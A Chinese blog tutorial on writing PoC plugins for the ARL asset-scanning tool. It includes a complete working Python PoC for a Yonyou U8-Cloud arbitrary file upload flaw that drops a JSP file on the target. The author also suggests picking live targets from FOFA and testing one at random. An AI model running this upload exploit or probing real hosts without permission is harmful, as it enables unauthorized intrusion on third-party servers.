arl-高级红队助手

置顶 已于 2023-12-12 21:42:36 修改
阅读量585 收藏 1
点赞数
分类专栏: 学习历程 文章标签: web安全
于 2023-12-12 21:41:21 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_29948489/article/details/134959672
版权

2023年了,外边的代码还是那么的飘逸…各家的poc是各家的poc…为了统一规范,花了一点时间写了下arl的poc,抛砖引玉,希望各位师傅能一起来开发poc

POC相关

灯塔的POC有点少添加一下,找到POC的添加,然后进入!image-20231023191930549

docker exec  -it 407edbf4b35b /bin/bash

这里直接找POC的所在位置,官方已经给出相关说明

https://github.com/1c3z/ARL-NPoC

进去之后来到/opt/ARL-NPoC

cd /opt/ARL-NPoC && ls

image-20231023192118531

新建终端,然后使用docker cp 将这个ARL-NPoC,拉到根目录

docker cp 407edbf4b35b:/opt/ARL-NPoC /

image-20231023192459875

下载到本地,进行分析。把里面的环境装一下(要有python环境)

pip install -r requirements.txt

使用vscode打开

image-20231023194334593

看POC的,没注释,让GPT生成注释即可

各个函数的意义

__init()__:初始化函数。
复制成功

def __init__(self):
    super(Plugin, self).__init__()
    # 插件类型poc
    self.plugin_type = PluginType.POC
    # 插件name
    self.vul_name = "泛微 Ecology getdata.jsp SQL注入漏洞"
    # 探测组件name
    self.app_name = 'Ecology'
    # 探测协议?
    self.scheme = [SchemeType.HTTP, SchemeType.HTTPS]

verify():验证函数。

def verify(self, target):   #参数target


http_req():请求函数。

def http_req(url, method = 'get', **kwargs): #传入url,请求方法get,post....


post请求实例:

http_req(url, method='post', data=data)
http_req(url, method='post', data=data, headers=header)



http_req()处理方法

1. content(): # 获取响应包
conn = http_req(url, "get")

if b"GitLab" not in conn.content:
      return False

2. json(): # json处理响应包

conn = http_req(url, "get")
data = conn.json()

3. status_code: #获取响应值

conn = http_req(url, "get", auth=(user, passwd))
if conn.status_code == 200:
     return True
conn = http_req(url)

4. text: #获取响应体。和content类似吧

conn = http_req(url, "get")
pattern = r'<meta\s+name="csrf-token"\s+content="([^\"]+)+"\s+/>'
matches = re.findall(pattern=pattern, string=conn.text)

5. headers.get() # 获取响应头

conn = http_req(url, "get")

if self._check_str not in conn.headers.get("WWW-Authenticate", ""):
       return False

6.self.logger.debug() #信息回显

self.logger.debug("not Ecology {}".format(target))


def init_logger():
    log_colors = {
        'DEBUG': 'white',
        'INFO': 'green',
        'SUCCESS':  'red',
        'WARNING': 'yellow',
        'ERROR': 'red',
        'CRITICAL': 'bold_red',
    }

后续代码编写可能会有问题,可以在本地简单测试保证不爆红之后再同步到远程arl。

pip install -e .      # 安装依赖
python setup.py --help-commands  # 查看安装命令帮助
python setup.py install       # 安装

image-20231026140517432

image-20231026140541979

提示帮助的同时也会加载编写好的插件,错误的插件会报错,此时就可以针对这些报错的插件做针对性修改。

xing -h

image-20231023201346429

(经过测试,本地win没有办法加载poc,所以在linux上传测试,上述的测试环境搭建也要再做一次)

下边是用友-U8-Cloud-任意文件上传的poc演示

poc要多些,这个poc也是比较简单,arl已经内置相关写法,多看看demo的各种写法即可

有bug,在arl默认是https走,要加前缀,已经解决)

#app="用友-U8-Cloud"
# 导入必要的模块
from xing.core.BasePlugin import BasePlugin  # 导入BasePlugin类,用于创建插件基类
from xing.utils import http_req  # 导入http_req函数,用于发送HTTP请求
from xing.core import PluginType, SchemeType  # 导入PluginType和SchemeType枚举,用于指定插件类型和协议类型

# 定义Plugin类,继承自BasePlugin
class Plugin(BasePlugin):
    def __init__(self):
        super(Plugin, self).__init__()  # 调用父类的构造函数
        self.plugin_type = PluginType.POC  # 将插件类型设置为POC(Proof of Concept,概念验证)
        self.vul_name = "用友-U8-Cloud-任意文件上传"  # 定义漏洞名称
        self.app_name = 'U8'  # 将应用程序名称定义为 U8
        self.scheme = [SchemeType.HTTP]  # 指定支持的协议类型和HTTP

    # 定义用于检测漏洞的verify方法
    def verify(self, target):
        path = ["/linux/pages/upload.jsp"]  # 定义待检测的路径列表
        url = target + path[0]  # 构建完整的URL
        
        # 设置请求头
        header = {
            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0",
            "Accept-Encoding": "gzip, deflate",
            "Accept": "*/*",
            "Connection": "close",
            "Content-Type": "application/x-www-form-urlencoded",
            "filename": "55051.jsp",
            "Content-Length": "30"
        }

        # 发送POST请求并获取响应
        data = '<% out.println(\"Console\"); %>'  # POST请求的数据


        #conn = requests.post(url, data=data, headers=header)
        conn = http_req(url, method='post', data=data, headers=header)
        
        content = conn.content  # 获取返回的内容

        # 发送GET请求并获取状态码
        conn1 = http_req(url + '/linux/55051.jsp')

        if conn.status_code != 404:  # 如果状态码不是404
            
            if (b"<title>This page for response" not in content and b"upload success" not in content) :  # 如果返回的内容不包含"<title>This page for response"或者"success file"
                
                self.logger.success("not found U8-Cloud-upload file")  # 打印调试信息

                return url  
                
            if (b"<title>This page for response" in content or b"upload success" in content) or (conn1.status_code == 200):  # 如果返回的内容包含指定的字符串


                self.logger.success("用友U8-Cloud-upload {}".format(target+'/linux/55051.jsp')) # 打印成功信息

                return target+'/linux/55051.jsp'    
                #return必须写,作为风险巡航-漏扫-凭证会用到

image-20231026160914233
)

目标从fofa找即可,关键字

app="用友-U8-Cloud"

这里随便找一个进行测试

image-20231026140214255

将测试好的poc上传到arl里

image-20231026141326311

回到灯塔,查看poc

image-20231026141440540

POC测试

在策略配置上选中POC单个测试

image-20231026161027943

扫描主机,然后风险任务下发,选择poc

执行完毕后会看到凭证,就是上传文件的证明

zzz的安全之路
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
灯塔ARL-NPoC全面教程
大河之犬的博客
12-05 1554
最新版的arl增加了poc编写与探测的功能,ARL-NPoC是一个集漏洞验证和任务运行的一个框架。向指定的目标发送请求,我们还需要获取请求的响应结果,以确定我们的poc是否触发成功,这里注意:当灯塔指定批量url进行识别时,如果当前的执行目录不是灯塔的安装目录,6、xing listener 端口监听,用于需要反连确认的漏洞探测。文件夹中,灯塔会自动将此插件同步到web服务器的插件列表中。8、xing scan 漏洞扫描,使用POC插件列表。其中,headers以列表方式传入,data随意。
探索未来科技:ARL-NPoC - 实现5G网络编程的开源项目
gitblog_00007的博客
04-01 256
探索未来科技:ARL-NPoC - 实现5G网络编程的开源项目 项目地址:https://gitcode.com/1c3z/ARL-NPoC 项目简介 ARL-NPoC 是一个基于软件定义网络(SDN)和网络功能虚拟化(NFV)的5G网络编程开源平台。该项目旨在为研究者、开发者和爱好者提供一种新的方式,以实验和创新的方式来探索和构建5G网络基础设施。通过ARL-NPoC,你可以实践5G网络的配置...
热门工具系列|灯塔的安利
白帽子凯哥聊黑客
06-09 532
然后合并去重,当然也可以结合子域名搜集等其他方式获取到的子域名列表合并去重。// 可以先资产侦查,然后再风险任务下发。最后,等扫描结束后,再点击详情,慢慢看。安装好后,记得第一时间修改密码!// 这样是不会进行信息收集的嗷。得到一份较为完整的子域名资产。填写好相关配置信息,点击确定。输入刚刚收集到的资产。然后就可以开始捡漏了。
ARL-NPoC:集突破验证和防御利用的一个框架
03-18
说明 集突破验证和防御利用的一个框架 依赖 安装 pip3 install -e . 使用 xing -h usage: xing [-h] [--version] [--quit] [--log {debug,info,success,warning,error}] {list,scan,sniffer,exploit,brute} ... positional arguments: {list,scan,sniffer,exploit,brute} 子命令 list 显示插件 scan 扫描 sniffer 协议识别 exploit 漏洞利用
ARL资产侦察灯塔系统搭建及使用】
热门推荐
qq_44637753的博客
08-14 1万+
ARL资产灯塔的搭建和使用。
ARL-NPoC:集漏洞验证和任务运行的一个框架 .zip
12-21
ARL-NPoC:集漏洞验证和任务运行的一个框架
ARL-master-wade.zip
最新发布
05-16
ARL-master-wade.zip
arl-eegmodels_kidsyv3_卷积神经网络_EEGclassification_EEGNet_
10-02
EEGNet 是一个用于 EEG 分类的卷积神经网络架构,附带其使用案例
ARL-TR-3567_trajectory_aerodynamics_
10-01
analytical prediction of trajectory
Python分布式工具开发(二)--指纹识别与POC验证
weixin_42282189的博客
10-08 678
作者: Beard_lin 免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责。 0x01 指纹与poc在分布式中的架构问题 因为加入工具后的合理问题,所以在控制节点与执行节点都要进行一些更改。 控制节点: 1.载入数据 2.数据分配 执行节点: 1.载入指纹识别代码 2.载入poc验证代码 3.载入数据存储代码 0x02 指纹识别的相关问题 对于web指纹的匹配大致有如下位置: 1.title 2.body 3.http头 4.相关目录 前三项发送的请求数据较小,在大批量数据.
论文研究-自相关过程SPC控制及其ARL的Monte-Carlo分析.pdf
09-08
对受控自相关过程建立其时间序列模型,并得出自相关过程的预测及预测误差。其次,通过Shewhart控制图原理验证预测误差的独立性;最后讨论了对均值发生阶跃型故障的自相关过程的SPC控制,并通过Monte-Carlo模拟,对Shewhart控制图以及EWMA控制图的ARL进行了深入地比较分析。
被动信息收集
m0_60121089的博客
06-24 2365
被动信息收集
资产扫描神器ARL增强改造
渗透测试研究中心
12-08 5416
拉取项目首先从GitHub克隆到服务器上。git clone https://github.com/ki9mu/ARL-plus-docker/修改配置文件因为ARL在配置文件里设置了黑名单,有时候项目为GOV或者EDU之类的时候无法进行扫描,所以在这里修改一下配置文件就可以解除限制。cd ARL-plus-docker/ vi config-docker.yaml在这里删掉黑名单里的几项就可以...
网络安全kali渗透学习 web渗透入门 ARL资产侦察灯塔系统搭建及使用
xueshenlaila的博客
01-21 7386
FOFA是一款非常强大的搜索引擎, FOFA(网络空间资产检索系统)是世界上数据覆盖更完整的IT设备搜索引擎,拥有全球联网IT设备更全的DNA信息。 探索全球互联网的资产信息,进行资产及漏洞影响范围分析、应用分布统计、应用流行度态势感知等。相对于shodan来说FOFA的优点就是更加本土化,拥有更多的域名数据,建立了全球最大的资产规则集,而且现在已经更新了识别蜜罐的功能。 这篇文章教大家如何使用资产检索FOFA搜索引擎收集信息 以下有视频版还有文字版 不知道怎么操作的请看文字版的,里面详细的步骤。 关注公众
【功能全】自动化渗透工具箱-Ary(附下载 )
hackzkaq的博客
02-07 2377
更多黑客技能 公众号:暗网黑客 来源:https://www.freebuf.com/sectool/260698.html 作者:挣扎的小小 这里最近参与CIS大会,看到一款自动化渗透工具 Ary,特点是汇聚了各种可以调用的工具。 介绍 工具地址 https://github.com/TeraSecTeam/ary POC收集 https://github.com/TeraSecTeam/poc-collection Ary是一个集各种渗透工具于一体的工具,不过看起来还是一个开发中的版本,试用了一.
ARL资产侦查灯塔系统
m0_58606546的博客
11-23 3593
一:ARL(Asset Reconnaissance Lighthouse)资产侦察灯塔系统安装教程 步骤一:Centos下安装Docker yum -y install docker yum -y install docker-compose system start docker 步骤二:拉取镜像文件并启动... docker pull tophant/arl git clone https://github.com/TophantTechnology/ARL cd ARL/docker/
Web安全班作业 | wireshark抓包+中间人攻击+绕过CDN+ARL灯塔+编写扫描器
Ms08067安全实验室
09-02 1645
文章来源|MS08067 WEB安全班课后作业本文作者:某学员A(Web安全培训班1期学员)按老师要求尝试完成布置的作业如下:1.使用wireshark抓包,根据实际数据包,分析ARP报文...
ARL-plus-docker
07-28
ARL (Attack Research Lab) 是一个开源的网络攻击和漏洞评估平台,它提供了一套功能强大的工具和框,用于收集、存储、分析和可视化网络安全数据。ARL 可以帮助安全研究人员和渗透测试人员发现网络中的漏洞和威胁。 Docker 是一个开源的容器化平台,它可以将应用程序及其依赖项打包成独立的容器,提供了轻量级、可移植和可扩展的部署解决方案。使用 Docker,可以方便地将 ARL 平台部署到不同的环境中,而无需担心环境差异和依赖问题。 结合 ARL 和 Docker,你可以通过以下步骤将 ARL 平台部署到 Docker 容器中: 1. 安装 Docker:首先,你需要在目标主机上安装 Docker。根据你的操作系统类型,可以参考 Docker 官方文档进行安装。 2. 构建 ARL Docker 镜像:在 ARL 项目代码目录下,你可以编写一个 Dockerfile 文件来定义 ARL 镜像的构建过程。Dockerfile 可以指定基础镜像、安装依赖项、复制代码等操作。通过运行 `docker build` 命令,可以构建 ARL Docker 镜像。 3. 运行 ARL 容器:使用构建好的 ARL Docker 镜像,你可以通过运行 `docker run` 命令来创建并运行一个 ARL 容器。可以指定端口映射、数据卷挂载等参数,以满足你的需求。 通过将 ARL 平台容器化,你可以方便地在不同环境中部署和管理 ARL,同时也能够更好地隔离和保护系统资源。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值